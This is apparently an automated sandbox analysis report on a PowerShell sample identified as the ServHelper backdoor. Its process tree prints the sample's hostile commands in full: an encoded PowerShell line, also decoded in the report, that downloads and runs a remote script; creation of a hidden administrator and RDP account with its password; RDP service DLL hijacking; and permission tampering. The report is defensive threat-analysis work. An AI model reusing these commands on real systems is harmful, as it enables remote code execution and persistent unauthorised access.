Analysis
- max time kernel: 123s
- max time network: 86s
- platform: windows7_x64
- resource: win7v20210410
- submitted: 18-08-2021 13:28
- Static task: static1
- Behavioral task: behavioral1
  Sample: b65273062c9be6bfc6343438e51d7f68aaecf8382ae1373ff1b3adfa~.ps1
  Resource: win7v20210410
- Behavioral task: behavioral2
  Sample: b65273062c9be6bfc6343438e51d7f68aaecf8382ae1373ff1b3adfa~.ps1
  Resource: win10v20210410

General
- Target: b65273062c9be6bfc6343438e51d7f68aaecf8382ae1373ff1b3adfa~.ps1
- Size: 2.6MB
- MD5: 35c34f487155cf7fc72c3146bfa1a016
- SHA1: 7ee148a4481dcbaba8e63235356f931243f30b37
- SHA256: b65273062c9be6bfc6343438e51d7f68aaecf8382ae1373ff1b3adfacff1fd5d
- SHA512: 188daeb03aa63c289649f45ead6f7d66d20d9549ed673c4449bc5b353b992654de78d114f784bf7f582a12daf029084e21123fff57e5318188de650d7099c32b

Malware Config
- Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
- ServHelper
  ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
- Grants admin privileges (1 TTPs)
  Uses net.exe to modify the user's privileges.
- Blocklisted process makes network request (1 IoCs)
  Processes (flow / pid / process):
    10  916  powershell.exe
- Modifies RDP port number used by Windows (1 TTPs)
- Possible privilege escalation attempt (8 IoCs)
  Processes (pid / process):
    1636  icacls.exe
    952   icacls.exe
    1144  icacls.exe
    692   icacls.exe
    1516  icacls.exe
    576   icacls.exe
    1628  icacls.exe
    1672  takeown.exe
- Sets DLL path for service in the registry (2 TTPs)
- Processes (resource / yara_rule):
    \Windows\Branding\mediasvc.png  upx
- Deletes itself (1 IoCs)
  Processes (pid / process):
    1116  powershell.exe
- Loads dropped DLL (2 IoCs)
  Processes (pid / process):
    608
    608
- Modifies file permissions (1 TTPs, 8 IoCs)
  Processes (pid / process):
    1516  icacls.exe
    576   icacls.exe
    1628  icacls.exe
    1672  takeown.exe
    1636  icacls.exe
    952   icacls.exe
    1144  icacls.exe
    692   icacls.exe
- Drops file in System32 directory (1 IoCs)
  Processes (description / ioc / process):
    File created  C:\Windows\system32\rfxvmt.dll  powershell.exe
- Drops file in Windows directory (21 IoCs)
  Processes (description / ioc / process):
    File created               C:\Windows\branding\mediasrv.png  powershell.exe
    File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9afeeca9-f9d1-4549-b70a-7b8ebbdfb82e  powershell.exe
    File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1e4a2880-eb41-4d2c-89ce-cdd9c1abcc64  powershell.exe
    File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c018e57c-b040-47db-9360-e03c66e0ee9e  powershell.exe
    File created               C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RSDMQB1EMF4KCGCQMO7P.temp  powershell.exe
    File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6cb64870-33ce-450d-be1d-c4ca619df375  powershell.exe
    File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex  powershell.exe
    File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8a1d74f7-1ec3-4e45-af92-957665a0bee9  powershell.exe
    File created               C:\Windows\branding\mediasvc.png  powershell.exe
    File created               C:\Windows\branding\wupsvc.jpg  powershell.exe
    File opened for modification  C:\Windows\branding\Basebrd  powershell.exe
    File opened for modification  C:\Windows\branding\ShellBrd  powershell.exe
    File opened for modification  C:\Windows\branding\mediasvc.png  powershell.exe
    File opened for modification  C:\Windows\branding\wupsvc.jpg  powershell.exe
    File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c327661e-14f6-47b9-8ba4-e310b712f97d  powershell.exe
    File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_33ffc59f-3ddc-4673-b136-3c406752aba9  powershell.exe
    File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dc45e851-387d-4910-82a3-f7a99b3bad26  powershell.exe
    File opened for modification  C:\Windows\branding\mediasrv.png  powershell.exe
    File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1d932505-2d6d-4598-8185-04b230f77765  powershell.exe
    File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d5cbeda8-7fcf-4a30-8f08-2c98775d931c  powershell.exe
    File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6f433178-8b5a-42c6-af2e-e69d70de3792  powershell.exe
- Modifies data under HKEY_USERS (4 IoCs)
  Processes (description / ioc / process):
    Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\  WMIC.exe
    Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\  WMIC.exe
    Key created       \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage  powershell.exe
    Set value (data)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 102c45dd3594d701  powershell.exe
- Modifies registry key (1 TTPs, 1 IoCs)
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (12 IoCs)
  Processes (pid / process):
    1116  powershell.exe
    528   powershell.exe
    528   powershell.exe
    916   powershell.exe
    916   powershell.exe
    824   powershell.exe
    824   powershell.exe
    1116  powershell.exe
    1116  powershell.exe
    1116  powershell.exe
    916   powershell.exe
    916   powershell.exe
- Suspicious behavior: LoadsDriver (5 IoCs)
  Processes (pid / process):
    464
    608
    608
    608
    608
- Suspicious use of AdjustPrivilegeToken (18 IoCs)
  Processes (description / pid / process):
    Token: SeDebugPrivilege               1116  powershell.exe
    Token: SeDebugPrivilege               528   powershell.exe
    Token: SeDebugPrivilege               916   powershell.exe
    Token: SeDebugPrivilege               824   powershell.exe
    Token: SeRestorePrivilege             952   icacls.exe
    Token: SeAssignPrimaryTokenPrivilege  948   WMIC.exe
    Token: SeIncreaseQuotaPrivilege       948   WMIC.exe
    Token: SeAuditPrivilege               948   WMIC.exe
    Token: SeAssignPrimaryTokenPrivilege  948   WMIC.exe
    Token: SeIncreaseQuotaPrivilege       948   WMIC.exe
    Token: SeAuditPrivilege               948   WMIC.exe
    Token: SeAssignPrimaryTokenPrivilege  1840  WMIC.exe
    Token: SeIncreaseQuotaPrivilege       1840  WMIC.exe
    Token: SeAuditPrivilege               1840  WMIC.exe
    Token: SeAssignPrimaryTokenPrivilege  1840  WMIC.exe
    Token: SeIncreaseQuotaPrivilege       1840  WMIC.exe
    Token: SeAuditPrivilege               1840  WMIC.exe
    Token: SeDebugPrivilege               916   powershell.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (pid / process / target pid / target process / times recorded):
    1116  powershell.exe  588   csc.exe         x3
    588   csc.exe         388   cvtres.exe      x3
    1116  powershell.exe  528   powershell.exe  x3
    1116  powershell.exe  916   powershell.exe  x3
    1116  powershell.exe  824   powershell.exe  x3
    1116  powershell.exe  1672  takeown.exe     x3
    1116  powershell.exe  1636  icacls.exe      x3
    1116  powershell.exe  952   icacls.exe      x3
    1116  powershell.exe  1144  icacls.exe      x3
    1116  powershell.exe  692   icacls.exe      x3
    1116  powershell.exe  1516  icacls.exe      x3
    1116  powershell.exe  576   icacls.exe      x3
    1116  powershell.exe  1628  icacls.exe      x3
    1116  powershell.exe  1496  reg.exe         x3
    1116  powershell.exe  1312  reg.exe         x3
    1116  powershell.exe  968   reg.exe         x3
    1116  powershell.exe  1860  net.exe         x3
    1860  net.exe         1936  net1.exe        x3
    1116  powershell.exe  1572  cmd.exe         x3
    1572  cmd.exe         1840  cmd.exe         x3
    1840  cmd.exe         1920  net.exe         x3
    1920  net.exe         2008  net1.exe        x1
Processes (indented by depth in the process tree; [n] is the depth)
- [1] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1116)
  Command line: powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\b65273062c9be6bfc6343438e51d7f68aaecf8382ae1373ff1b3adfa~.ps1
  Signatures: Deletes itself; Drops file in System32 directory; Drops file in Windows directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - [2] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (PID 588)
    Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bkor3f3f\bkor3f3f.cmdline"
    Signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (PID 388)
      Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB9FC.tmp" "c:\Users\Admin\AppData\Local\Temp\bkor3f3f\CSC214DF0007E2C4E6FBC15224A8234D3C.TMP"
  - [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 528)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 916)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 824)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - [2] C:\Windows\system32\takeown.exe (PID 1672)
    Command line: "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    Signatures: Possible privilege escalation attempt; Modifies file permissions
  - [2] C:\Windows\system32\icacls.exe (PID 1636)
    Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    Signatures: Possible privilege escalation attempt; Modifies file permissions
  - [2] C:\Windows\system32\icacls.exe (PID 952)
    Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    Signatures: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
  - [2] C:\Windows\system32\icacls.exe (PID 1144)
    Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    Signatures: Possible privilege escalation attempt; Modifies file permissions
  - [2] C:\Windows\system32\icacls.exe (PID 692)
    Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    Signatures: Possible privilege escalation attempt; Modifies file permissions
  - [2] C:\Windows\system32\icacls.exe (PID 1516)
    Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    Signatures: Possible privilege escalation attempt; Modifies file permissions
  - [2] C:\Windows\system32\icacls.exe (PID 576)
    Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    Signatures: Possible privilege escalation attempt; Modifies file permissions
  - [2] C:\Windows\system32\icacls.exe (PID 1628)
    Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    Signatures: Possible privilege escalation attempt; Modifies file permissions
  - [2] C:\Windows\system32\reg.exe (PID 1496)
    Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
  - [2] C:\Windows\system32\reg.exe (PID 1312)
    Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    Signatures: Modifies registry key
  - [2] C:\Windows\system32\reg.exe (PID 968)
    Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
  - [2] C:\Windows\system32\net.exe (PID 1860)
    Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    Signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\net1.exe (PID 1936)
      Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
  - [2] C:\Windows\system32\cmd.exe (PID 1572)
    Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    Signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\cmd.exe (PID 1840)
      Command line: cmd /c net start rdpdr
      Signatures: Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\net.exe (PID 1920)
        Command line: net start rdpdr
        Signatures: Suspicious use of WriteProcessMemory
        - [5] C:\Windows\system32\net1.exe (PID 2008)
          Command line: C:\Windows\system32\net1 start rdpdr
  - [2] C:\Windows\system32\cmd.exe (PID 1160)
    Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    - [3] C:\Windows\system32\cmd.exe (PID 1512)
      Command line: cmd /c net start TermService
      - [4] C:\Windows\system32\net.exe (PID 832)
        Command line: net start TermService
        - [5] C:\Windows\system32\net1.exe (PID 700)
          Command line: C:\Windows\system32\net1 start TermService
  - [2] C:\Windows\system32\cmd.exe (PID 1336)
    Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
  - [2] C:\Windows\system32\cmd.exe (PID 672)
    Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
- [1] C:\Windows\System32\cmd.exe (PID 1668)
  Command line: cmd /C net.exe user WgaUtilAcc 000000 /del
  - [2] C:\Windows\system32\net.exe (PID 1648)
    Command line: net.exe user WgaUtilAcc 000000 /del
    - [3] C:\Windows\system32\net1.exe (PID 1336)
      Command line: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
- [1] C:\Windows\System32\cmd.exe (PID 1144)
  Command line: cmd /C net.exe user WgaUtilAcc j5uA500A /add
  - [2] C:\Windows\system32\net.exe (PID 1204)
    Command line: net.exe user WgaUtilAcc j5uA500A /add
    - [3] C:\Windows\system32\net1.exe (PID 1600)
      Command line: C:\Windows\system32\net1 user WgaUtilAcc j5uA500A /add
- [1] C:\Windows\System32\cmd.exe (PID 1088)
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  - [2] C:\Windows\system32\net.exe (PID 2032)
    Command line: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    - [3] C:\Windows\system32\net1.exe (PID 316)
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
- [1] C:\Windows\System32\cmd.exe (PID 992)
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
  - [2] C:\Windows\system32\net.exe (PID 2024)
    Command line: net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
    - [3] C:\Windows\system32\net1.exe (PID 1596)
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
- [1] C:\Windows\System32\cmd.exe (PID 296)
  Command line: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  - [2] C:\Windows\system32\net.exe (PID 740)
    Command line: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
    - [3] C:\Windows\system32\net1.exe (PID 1296)
      Command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
- [1] C:\Windows\System32\cmd.exe (PID 1556)
  Command line: cmd /C net.exe user WgaUtilAcc j5uA500A
  - [2] C:\Windows\system32\net.exe (PID 1336)
    Command line: net.exe user WgaUtilAcc j5uA500A
    - [3] C:\Windows\system32\net1.exe (PID 672)
      Command line: C:\Windows\system32\net1 user WgaUtilAcc j5uA500A
- [1] C:\Windows\System32\cmd.exe (PID 1532)
  Command line: cmd.exe /C wmic path win32_VideoController get name
  - [2] C:\Windows\System32\Wbem\WMIC.exe (PID 948)
    Command line: wmic path win32_VideoController get name
    Signatures: Modifies data under HKEY_USERS; Suspicious use of AdjustPrivilegeToken
- [1] C:\Windows\System32\cmd.exe (PID 1628)
  Command line: cmd.exe /C wmic CPU get NAME
  - [2] C:\Windows\System32\Wbem\WMIC.exe (PID 1840)
    Command line: wmic CPU get NAME
    Signatures: Modifies data under HKEY_USERS; Suspicious use of AdjustPrivilegeToken
- [1] C:\Windows\System32\cmd.exe (PID 1232)
  Command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  - [2] C:\Windows\system32\cmd.exe (PID 1964)
    Command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    - [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 916)
      Command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      The -enc argument is base64 of a UTF-16LE string; decoded it reads: IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1"), which is the URL listed under Malware Config above.
      Signatures: Blocklisted process makes network request; Drops file in Windows directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Downloads